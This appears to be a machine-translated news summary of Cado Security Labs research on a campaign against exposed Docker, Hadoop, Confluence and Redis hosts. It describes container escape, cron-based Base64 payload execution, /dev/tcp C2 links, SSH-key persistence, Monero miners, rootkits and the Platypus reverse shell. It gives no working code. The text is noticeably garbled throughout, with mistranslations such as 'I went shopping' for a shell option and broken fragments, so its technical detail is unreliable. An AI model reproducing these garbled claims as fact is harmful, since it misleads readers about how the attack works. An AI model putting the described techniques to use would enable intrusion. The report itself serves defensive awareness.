Researchers at Cado Security Labs received a warning about a honeypot using the Docker Engine API. “Docker command received…” they wrote. “I spawned a new container based on Alpine Linux and created a bind mount of the root directory of the underlying honeypot server…”
This is typically exploited to write out jobs for the Cron scheduler to run. In this particular campaign, the attacker exploits this exact method to write an executable file to the path. /usr/bin/vurlIt also registers a Cron job to decode some Base64-encoded shell commands and run them on the fly via a pipe. bash.
of Var The executable consists of only simple shell script functions and is used to establish a TCP connection with the attacker's command and control (C2) infrastructure. /dev/tcp device file. The above Cron job is Var Executable file to retrieve the first stage payload from the C2 server… Var If the payload retrieval method fails, the attacker writes an additional Cron job that attempts to use Python. URLlib2 A library that retrieves another payload named death,
“Multiple user-mode rootkits have been deployed to hide malicious processes,” they note. And one of the shell scripts is “ I went shopping (shell option) Included to prevent additional shell commands from an attacker's session from being added to the history file…in addition to preventing additional commands from being written to the history file. I went shopping Once a new session is spawned, the command itself does not appear in the shell history. ”
According to the article, the same script also injected “attacker-controlled SSH keys to maintain access to compromised hosts,” obtained miners of the Monero cryptocurrency, and created “systemd “Register persistence in the form of a service.” An open source Golang reverse shell utility named Platypus.
According to the blog, it also offers “a variety of utilities.” security week, including “mass scan” for host detection. ” Citing CADO researchers, they also write that the shell scripts “weak machines by disabling SELinux and other features and uninstalling monitoring agents.”
The Golang payloads deployed in these attacks allow attackers to search for and remove Docker images from Ubuntu or Alpine repositories and create misconfigured or vulnerable Hadoop, Confluence, Docker, and Redis instances exposed to the internet. can be identified and exploited. [“For the Docker compromise, the attackers spawn a container and escape from it onto the underlying host,” the researchers writes.]
“This large-scale attack demonstrates the variety of early access techniques available to cloud and Linux malware developers,” Cado points out. “An attacker spends significant time understanding the types of web-enabled services deployed in cloud environments, stays on top of reported vulnerabilities in those services, and leverages that knowledge. It is clear that they are gaining a foothold in the target environment.”
